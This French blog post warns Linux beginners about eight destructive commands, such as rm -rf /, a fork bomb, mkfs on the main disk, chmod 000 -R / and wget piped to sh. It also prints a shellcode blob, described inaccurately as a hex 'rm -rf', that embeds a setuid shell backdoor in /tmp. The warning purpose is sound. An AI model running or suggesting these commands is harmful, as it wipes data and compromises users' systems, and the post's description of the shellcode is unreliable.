8 commandes Unix pour crasher votre système

Publié le 05 décembre 2008 par Theclimber

Si vous êtes nouveau sous linux, il y a des chances que vous rencontriez des gens stupides sur des forums ou dans des salons de chats qui pourraient vous conseiller d’exécuter des commandes louches dans votre terminal. Ces commandes pourraient crasher tout votre système de fichiers … voire pire, tout votre système d’exploitation. Pour éviter ce genre de scénarios dangereux, voici une petite liste non-exhaustive des commandes que vous feriez mieux d’éviter.

1. Code:

[bash]
rm -rf /

Cette commande va supprimer (sans vous poser de question de confirmation) récursivement tous les fichiers et répertoires qui se trouvent dans votre dossier racine, c’est à dire tout.

2. Code:

[bash]
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

Ceci est la forme hexadecimale de “rm -rf” qui pourrait surprendre même des personnes plus expérimentées sous Linux

3. Code:

[bash]
mkfs.ext3 /dev/sda

Ceci va reformater et supprimer tous les fichiers qui se trouvent sur ce périphérique … or /dev/hda c’est en général votre disque dur principal.

4. Code:

[bash]
:(){:|:&};:

Connu sous le nom de “forkbomb” (bombe de fork), cette commande va dire à votre système d’éxécuter un nombre énorme de process jusqu’à ce qu’il gèle le système. Ceci peut souvent mener à des corruptions de données.

5. Code:

[bash]
toute_commande > /dev/sda

Avec cette commande, les données renvoyées par votre commande toute_commande sera directement écrite sur un block du périphérique ce qui va engendrer des problèmes sur ce dernier, voire conduire à une perte totale des données.

6. Code:

[bash]
wget http://some_untrusted_source -O- | sh

Cette commande-ci ne va pas nécessairement tout foutre en l’air … mais va exécuter sans vous demander votre avis le contenu se trouvant à la page pointée. Donc n’exécutez jamais une commande du genre si vous n’êtes pas certain de la source qui vous envoie ce lien. Ca pourrait executer du code malicieux inapproprié.

7. Code:

[bash]
mv /home/yourhomedirectory/* /dev/null

Cette commande-cu va déplacer votre répertoire et tous les fichiers qui se trouvent dedans dans un endroit qui n’existe pas. En d’autres mots vous n’allez plus jamais les revoir.

8. Code:

[bash]
chmod 000 -R /

Ici tous les fichiers récursivement en partant de la racine vont changer de permissions. Ils seront tous en “not-readable”, “not-executable”, “not-writable” … en d’autres mots, votre système sera inutilisable. Mais récupérable avec un liveCD.

Il y a surement plein d’autres commandes équivalentes pour crasher votre ordi et que je n’ai pas citées ici, donc si vous pensez à d’autres commandes du genre, n’hésitez pas à les ajouter en commantaire.

Cet article est une traduction de l’article The 7 Deadly Linux Commands et un peu amélioré.